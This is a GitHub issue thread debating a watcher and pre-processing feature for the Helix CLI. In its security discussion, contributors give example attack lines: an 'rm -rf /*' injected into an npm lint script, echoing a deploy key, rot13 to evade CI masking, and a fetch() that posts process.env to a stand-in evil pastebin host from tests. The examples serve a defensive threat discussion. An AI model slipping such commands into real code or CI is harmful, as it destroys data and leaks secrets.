### ISSUE TITLE
Add watcher and pre-processing support

### ISSUE THREAD

**Issue by sdmcraft** [adobe/helix-cli#2129]
Frontend code for Franklin Sites using tools such as `less`, `sass/scss`, `babel`, `webpack` etc.  often need an additional pre-processing step to compile these files. [Here's an example](https://github.com/hlxsites/nedbank#run-less-auto-compile-and-franklin-pages-together). Developers across different Franklin Sites projects implement it redundantly and differently.  

This can be improved by adding a generic support in  `helix-cli` for providing an ability to specify watchers and pre-processors purely as project configurations, thus removing the burden of setting up custom implementations for this at project level.

## Motivation
1. With this, the developer need not bother about running/documenting custom scripts which wrap hlx up and/or separate watcher processes. They can simply configure it in package.json once and use the hlx up as usual.

2. This gives more control over the filesystem monitoring aspect of pre-processors by tying them up to the liveReload watcher of the cli, thereby ensuring that all pre-compilation completes before the liveReload happens. We could even ensure the order in which they get executed through configuration. Running these as separate processes may interleave the liveReload and preCompilation processes non-deterministically and introduce race conditions.

Not to be seen as a replacement of grunt or similar setups as that would still be needed. Its primarily their filesystem monitoring aspect that I propose to link to the live-reload of the cli, otherwise keeping it generic. Let me know your thoughts.

## Proposed sample configuration
```
  "watches": [
    {
      "name": "watch:less",
      "globs": [
        "styles/*.less",
        "blocks/**/*.less"
      ],
      "command": "less-watch-compiler --run-once styles styles & less-watch-compiler --run-once blocks blocks"
    }
  ],
```

**Comment by tripodsan** [comment]
I don't think we should have an opinion on how to integrate with developer workflows. Projects with generated code usually already have their grunt or similar setups that can monitor for filesystem changes.

**Comment by sdmcraft** [comment]
> I don't think we should have an opinion on how to integrate with developer workflows. Projects with generated code usually already have their grunt or similar setups that can monitor for filesystem changes.

@tripodsan , indeed that was the approach I adopted in one of the projects which needed `less` pre-compilation. From that experience, a couple of reasons I feel this may be useful:
 
1. With this, the developer need not bother about running/documenting custom scripts which wrap `hlx up`  and/or separate watcher processes. They can simply configure it in `package.json` once and use the `hlx up` as usual.
2. This gives more control over the filesystem monitoring aspect of pre-processors by tying them up to the `liveReload` watcher of the `cli`, thereby ensuring that all pre-compilation completes before the `liveReload` happens. We could even ensure the order in which they get executed through configuration. Running these as separate processes may interleave the `liveReload` and `preCompilation` processes non-deterministically and introduce race conditions.

Also I do not see this as a replacement of grunt or similar setups as that would still be needed. Its primarily their filesystem monitoring aspect that I propose to link to the live-reload of the cli, otherwise keeping it generic. Let me know your thoughts.

Also copying @trieloff as I had been discussing some of the initial thoughts on this with him.

**Comment by tripodsan** [comment]
ok. but I don't think we should re-invent the wheel. @davidnuescheler WDYT?

> We could even ensure the order in which they get executed through configuration.

so you also need to ensure that the external processes don't modify files that in-turn trigger an exec.

**Comment by trieloff** [comment]
> so you also need to ensure that the external processes don't modify files that in-turn trigger an exec.

that's one advantage of having it in the same process: we are already debouncing the filesystem events with a small timeout, so that multiple changes in a short time don't trigger two consecutive client-side refreshes. By having `hlx` execute these scripts, we know when the processes have finished, ignore further events during that time and delay the reload until everything has been built.

In the spirit of `hlx` is all you need, I'd rather have something built in that is able to execute a small CLI than encourage users to install `gulp`, `grunt` or any other complicated toolchain.

**Comment by davidnuescheler** [comment]
@trieloff @sdmcraft i think we really need to make sure that we have actual use in production projects before adding extension points, especially for something like this where it can easily be added on a per project basis. 

i noticed that we are adding extension points and complexity / dependencies without much oversight again and i think this is something that we really need to make sure that we are more careful...

**Comment by trieloff** [comment]
Here are three examples of custom build scripts crudely integrated into the project's development workflow

https://github.com/hlxsites/nedbank/blob/f4fd3408c9e9933057d041d61865baf1522fc73f/package.json#L14
https://github.com/hlxsites/bamboohr-website/pull/109/files#diff-7ae45ad102eab3b6d7e7896acd08c427a9b25b346470d7bc6507b6481575d519R12
https://github.com/hlxsites/tmg-ucm/blob/6cc0120e5460d0a4d3b9cc87b6f1e60cc48868ae/package.json#L15

**Comment by tripodsan** [comment]
I  also have a security concern by adding support for `exec` in the cli. malicious or inadvertent config changes might result in executing arbitrary commands on the developers machine or, worse, in the CI pipeline. if projects choose to use grunt/gulp, they are aware of the risks and it is not the helix-cli's problem when things go wrong.

**Comment by tripodsan** [comment]
> By having hlx execute these scripts, we know when the processes have finished, ignore further events during that time and delay the reload until everything has been built.

hmm....maybe.

**Comment by sdmcraft** [comment]
> I also have a security concern by adding support for `exec` in the cli. malicious or inadvertent config changes might result in executing arbitrary commands on the developers machine or, worse, in the CI pipeline. if projects choose to use grunt/gulp, they are aware of the risks and it is not the helix-cli's problem when things go wrong.

@tripodsan , yes that's a valid security concern. I am wondering if its possible to do this even today via injecting a malicious command which CI ends up running like adding `"lint": "rm -rf /*,` since the CI runs `npm run lint` like below 
![image](https://user-images.githubusercontent.com/1191451/219415945-73db23ad-090c-4ce4-8fff-5a9f42ca9fbf.png)

**Comment by tripodsan** [comment]
:-) that's not a problem, you just delete the ci systems stuff. 
but `echo SUPER_SECRET_DEPLOY_KEY` is more of a problem. that's why usually the actions don't run on forked PRs.

**Comment by sdmcraft** [comment]
ok, just for my understanding, what prevents `echo SUPER_SECRET_DEPLOY_KEY`  from being an issue for a PR created from the same repo.

**Comment by tripodsan** [comment]
> ok, just for my understanding, what prevents `echo SUPER_SECRET_DEPLOY_KEY` from being an issue for a PR created from the same repo.

trusting the contributors ;-)

**Comment by trieloff** [comment]
And the CI systems actually mask all of the environment variables when you print them in plain text. An infiltrator would have to be a bit smarter and rot13 them before printing them.

**Comment by sdmcraft** [comment]
ok, in that case I am not sure if introducing an option to `exec` using watchers introduces a new threat vector beyond what's already possible via any other `npm run ...` that the CI system or a user may end up running. It of course does pull in `helix cli` in the mix which I think @tripodsan is your  primary concern.

**Comment by tripodsan** [comment]
> And the CI systems actually mask all of the environment variables when you print them in plain text. An infiltrator would have to be a bit smarter and rot13 them before printing them.

well, I would not even echo them, because I might not have access to the CI output. but instead do a `fetch('https://my-evil.pastebin.com', { method: 'POST', body: process.env }` somewhere in the tests.

**Comment by sdmcraft** [comment]
The primary motivation as I had mentioned in the ticket description was that with this, the developer need not bother about running/documenting custom scripts which wrap hlx up and/or separate watcher processes. They can simply configure it in package.json once and use the `hlx up` as usual.  
But with that said, I agree that project level configs work for now. We can wait till a need surfaces for this.
